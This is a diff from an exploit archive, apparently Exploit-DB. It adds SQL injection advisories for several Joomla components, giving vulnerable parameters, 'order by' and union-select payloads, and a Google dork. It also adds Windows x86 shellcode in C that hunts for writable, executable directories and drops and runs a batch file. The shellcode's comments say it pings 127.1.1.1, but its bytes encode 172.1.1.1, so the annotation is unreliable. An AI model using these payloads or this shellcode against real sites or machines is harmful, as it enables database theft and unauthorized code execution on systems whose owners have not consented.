# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
|
||||||
|
# Version: 3.8.1
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# Login as regular user
|
||||||
|
# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
|
||||||
|
# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
|
||||||
|
# '+order+by+10-- -
|
||||||
|
# Etc...
|
||||||
|
# # # # #
|
||||||
|
|
22
platforms/php/webapps/41463.txt
Executable file
22
platforms/php/webapps/41463.txt
Executable file
|
@ -0,0 +1,22 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 25.02.2017
|
||||||
|
# Vendor Homepage: https://www.cmsplugin.com/
|
||||||
|
# Software : https://www.cmsplugin.com/products/components/10-my-msg
|
||||||
|
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
|
||||||
|
# Version: 3.2.1
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# Login as regular user
|
||||||
|
# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
|
||||||
|
# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
|
||||||
|
# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
|
||||||
|
# '+order+by+10-- -
|
||||||
|
# Etc...
|
||||||
|
# # # # #
|
17
platforms/php/webapps/41464.txt
Executable file
17
platforms/php/webapps/41464.txt
Executable file
|
@ -0,0 +1,17 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component Spinner 360 v1.3.0 - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 25.02.2017
|
||||||
|
# Vendor Homepage: https://www.cmsplugin.com/
|
||||||
|
# Software : https://www.cmsplugin.com/products/components/13-spinner360
|
||||||
|
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/spinner-360
|
||||||
|
# Version: 1.3.0
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/spinner-360?Ihsan_Sencan=[SQL]
|
||||||
|
# # # # #
|
20
platforms/php/webapps/41465.txt
Executable file
20
platforms/php/webapps/41465.txt
Executable file
|
@ -0,0 +1,20 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component JomSocial - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 25.02.2017
|
||||||
|
# Vendor Homepage: https://www.cmsplugin.com/
|
||||||
|
# Software : http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
|
||||||
|
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
|
||||||
|
# Version: N/A
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# Login as regular user
|
||||||
|
# http://localhost/[PATH]/groups/?IhsanSencan=[SQL]
|
||||||
|
# http://localhost/[PATH]/videos/?IhsanSencan=[SQL]
|
||||||
|
# http://localhost/[PATH]/events/?IhsanSencan=[SQL]
|
||||||
|
# # # # #
|
18
platforms/php/webapps/41470.txt
Executable file
18
platforms/php/webapps/41470.txt
Executable file
|
@ -0,0 +1,18 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
|
||||||
|
# Google Dork: inurl:index.php?option=com_onevote
|
||||||
|
# Date: 27.02.2017
|
||||||
|
# Vendor Homepage: http://advcomsys.com/
|
||||||
|
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
|
||||||
|
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
|
||||||
|
# +/*!50000union*/+select+@@version-- -
|
||||||
|
# # # # #
|
90
platforms/win_x86/shellcode/41467.c
Executable file
90
platforms/win_x86/shellcode/41467.c
Executable file
|
@ -0,0 +1,90 @@
|
||||||
|
# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
|
||||||
|
# Date: 26-02-2017
|
||||||
|
# Author: Krzysztof Przybylski
|
||||||
|
# Platform: Win_x86
|
||||||
|
# Tested on: WinXP SP1
|
||||||
|
# Shellcode Size: 130 bytes
|
||||||
|
|
||||||
|
/*
|
||||||
|
Description:
|
||||||
|
write & exec dir searcher
|
||||||
|
starts from C:\
|
||||||
|
If dir found then write, execute (ping 127.1.1.1) and exit
|
||||||
|
If Write/noexec dir found then continue
|
||||||
|
|
||||||
|
Tested on WinXP SP1 (77e6fd35;77e798fd)
|
||||||
|
i686-w64-mingw32-gcc shell.c -o golddgger.exe
|
||||||
|
|
||||||
|
Null-free version:
|
||||||
|
|
||||||
|
(gdb) disassemble
|
||||||
|
Dump of assembler code for function function:
|
||||||
|
=> 0x08048062 <+0>: pop ecx
|
||||||
|
0x08048063 <+1>: xor eax,eax
|
||||||
|
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
|
||||||
|
0x08048068 <+6>: push eax
|
||||||
|
0x08048069 <+7>: push ecx
|
||||||
|
0x0804806a <+8>: mov eax,0x77e6fd35
|
||||||
|
0x0804806f <+13>: call eax
|
||||||
|
0x08048071 <+15>: xor eax,eax
|
||||||
|
0x08048073 <+17>: push eax
|
||||||
|
0x08048074 <+18>: mov eax,0x77e798fd
|
||||||
|
0x08048079 <+23>: call eax
|
||||||
|
|
||||||
|
|
||||||
|
NULL-free shellcode (132 bytes):
|
||||||
|
|
||||||
|
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
|
||||||
|
"\x50\x51\xb8"
|
||||||
|
"\x35\xfd\xe6\x77" // exec
|
||||||
|
"\xff\xd0\x31\xc0\x50\xb8"
|
||||||
|
"\xfd\x98\xe7\x77" // exit
|
||||||
|
"\xff\xd0\xe8\xe2\xff\xff\xff"
|
||||||
|
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
|
||||||
|
"\x2f\x43\x20\x22\x28\x63\x64\x20"
|
||||||
|
"\x63\x3a\x5c" // C:\
|
||||||
|
"\x20\x26\x46\x4f\x52"
|
||||||
|
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
|
||||||
|
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
|
||||||
|
"\x20\x44\x4f\x20"
|
||||||
|
"\x65\x63\x68\x6f\x20"
|
||||||
|
"\x70\x69\x6e\x67\x20"
|
||||||
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
||||||
|
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
|
||||||
|
"\x61\x74\x22\x26\x28\x63\x61\x6c"
|
||||||
|
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
|
||||||
|
"\x62\x61\x74\x22\x26\x26\x65\x78"
|
||||||
|
"\x69\x74\x29\x29\x22";
|
||||||
|
|
||||||
|
*/
|
||||||
|
// NULL version (130 bytes):
|
||||||
|
|
||||||
|
char code[] =
|
||||||
|
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
|
||||||
|
"\x35\xfd\xe6\x77" // exec
|
||||||
|
"\xff\xd0\x31\xc0\x50\xb8"
|
||||||
|
"\xfd\x98\xe7\x77" // exit
|
||||||
|
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
|
||||||
|
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
|
||||||
|
"\x43\x20\x22\x28\x63\x64\x20"
|
||||||
|
"\x63\x3a\x5c" // C:\
|
||||||
|
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
|
||||||
|
"\x20\x2f\x72\x20\x25\x41\x20\x49"
|
||||||
|
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
|
||||||
|
"\x20\x65\x63\x68\x6f\x20\x70\x69"
|
||||||
|
"\x6e\x67\x20"
|
||||||
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
||||||
|
"\x3e\x22\x25\x41"
|
||||||
|
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
|
||||||
|
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
|
||||||
|
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
|
||||||
|
"\x26\x26\x65\x78\x69\x74\x29\x29"
|
||||||
|
"\x22\x00";
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
|
||||||
|
{
|
||||||
|
int (*func)();
|
||||||
|
func = (int (*)()) code;
|
||||||
|
(int)(*func)();
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue